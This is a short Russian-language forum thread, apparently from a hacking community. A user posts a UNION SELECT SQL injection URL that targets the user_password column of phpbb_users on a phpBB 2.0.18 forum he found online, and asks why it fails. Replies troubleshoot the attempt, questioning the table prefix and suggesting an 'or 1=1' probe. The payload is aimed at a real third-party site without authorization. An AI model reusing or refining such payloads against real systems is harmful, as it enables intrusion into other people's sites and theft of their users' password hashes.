Вопрос насчет sql injection.
 

Я хотел бы узнать почему не получается провести sql injection,понимаю мембер ачата уже должен наизусть выучить все это и с этим у него не должно быть никаких проблем,но у мя возникли (может из за моей невнимательности).
Вот код
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=айди юзера/* я нашел форум и решил попробовать на нем,как всегда у мя ничего не вышло =).Он после запроса выкидавал выкидывал на гшлавнубю страницу форума,то есть ни хеша ничего мне не выдает.Кстати форум на движке phpbb 2.0.18.
Спасибо за помощь.Не ругайтесь пожалуйста.=)

А кто сказал что префикс phpbb? и вообще, запрос может быть вполне неверен...

ну извини я сначало видео посмотрел а потом поробовал.

Народ в чем же ошибка?

может профиксили? попробуй просто -99+or+1=1 че будет

У меня так всё работает...
ЗЫ чё-то как-то пробелы сами добавляются....

он меня так же выкидывает на index.php.Ничего не происходит.
ты имеешь ввиду у тя таким образом все получается?

Судя по ответу работает-соответственно получается:)

Мемберы античата не все разбираються в sql.

успокойся,если не хочешь чтоб я был в мемберах так и скажи =)

Насчет вопроса - получается что профиксили?